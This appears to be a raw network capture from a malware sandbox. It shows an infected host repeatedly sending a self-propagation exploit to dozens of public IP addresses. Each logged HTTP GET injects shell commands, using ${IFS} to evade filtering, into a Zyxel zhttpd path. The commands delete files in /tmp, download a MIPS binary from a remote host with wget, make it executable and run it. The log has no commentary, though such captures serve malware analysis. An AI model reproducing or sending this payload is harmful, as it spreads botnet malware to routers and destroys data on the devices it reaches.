                              Mar 31, 2024 08:42:16.472824097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9068192.168.2.133305862.165.50.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.472898960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9069192.168.2.1338206189.169.241.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.472940922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9070192.168.2.1352020108.95.140.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.473010063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9071192.168.2.1338806178.146.98.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.473023891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9072192.168.2.1342420220.6.120.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.473092079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9073192.168.2.135890223.204.148.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.473144054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9074192.168.2.135111213.180.93.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.473207951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9075192.168.2.133972290.94.78.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.473244905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9076192.168.2.1334952216.80.128.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.473311901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9077192.168.2.1338792121.133.167.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.473356962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9078192.168.2.1335592121.85.33.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.473417044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9079192.168.2.1345390116.76.186.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.473457098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9080192.168.2.1337626115.51.175.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.473495007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9081192.168.2.1357030161.159.239.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.473540068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9082192.168.2.133941019.173.82.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.473602057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9083192.168.2.1347770222.109.178.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.473643064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9084192.168.2.1357778204.59.75.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.473686934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9085192.168.2.1334512180.207.50.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.473757029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9086192.168.2.133503652.198.2.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.473802090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9087192.168.2.1337480123.232.86.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.473834991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9088192.168.2.1350766175.139.145.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.473901033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9089192.168.2.133538276.16.78.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.473942041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9090192.168.2.1349950169.166.173.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.474030972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9091192.168.2.1343344210.99.193.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.474061012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9092192.168.2.1341292147.61.58.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.474136114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9093192.168.2.133406497.43.58.77443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.474172115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9094192.168.2.1338518211.214.125.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.474227905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9095192.168.2.1354058130.250.71.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.474302053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9096192.168.2.1357090201.63.64.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.474353075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9097192.168.2.134384067.165.241.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.474416971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9098192.168.2.134486274.218.142.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.474457979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9099192.168.2.133741617.244.31.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.474519014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9100192.168.2.1336938110.203.159.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.474567890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9101192.168.2.1332828200.201.65.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.474642038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9102192.168.2.135262091.150.109.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.474684954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9103192.168.2.1346534172.117.1.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.474720955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9104192.168.2.135778232.65.241.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.474754095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9105192.168.2.1355344158.219.169.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.474792004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9106192.168.2.1354526204.6.81.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.474849939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9107192.168.2.1338948134.32.93.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.474917889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9108192.168.2.13563784.174.175.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.474965096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9109192.168.2.1334006183.188.237.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.474999905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9110192.168.2.1358390187.171.108.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.475075006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9111192.168.2.1342714222.229.180.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.475106001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9112192.168.2.134480297.61.13.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.475173950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9113192.168.2.1340574208.253.252.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.475213051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9114192.168.2.1357970186.67.10.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.475267887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9115192.168.2.135535876.187.3.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.475325108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9116192.168.2.1343142204.86.76.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.475358963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9117192.168.2.1346062110.100.236.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.475440979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9118192.168.2.1342756147.209.136.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.475517988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9119192.168.2.1337642219.60.200.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.475574970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9120192.168.2.135241699.127.189.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.475634098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9121192.168.2.135089067.87.44.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.475665092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9122192.168.2.1353606223.77.218.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.475725889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9123192.168.2.134244660.18.184.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.475764036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9124192.168.2.133987673.47.123.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.475799084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9125192.168.2.1352024175.73.232.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.475820065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9126192.168.2.134238253.85.85.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.475869894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9127192.168.2.135273262.113.110.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.475917101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9128192.168.2.1338356158.86.69.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.475974083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9129192.168.2.1334076184.44.201.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.476011992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9130192.168.2.1355048136.76.3.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.476042986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9131192.168.2.1358488141.245.208.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.476114035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9132192.168.2.1354498130.118.113.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.476176023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9133192.168.2.135342842.119.153.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.476237059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9134192.168.2.1358578107.205.69.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.476300001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9135192.168.2.1346966198.116.14.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.476347923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9136192.168.2.1338196133.0.135.90443
                              TimestampBytes transferredDirectionData
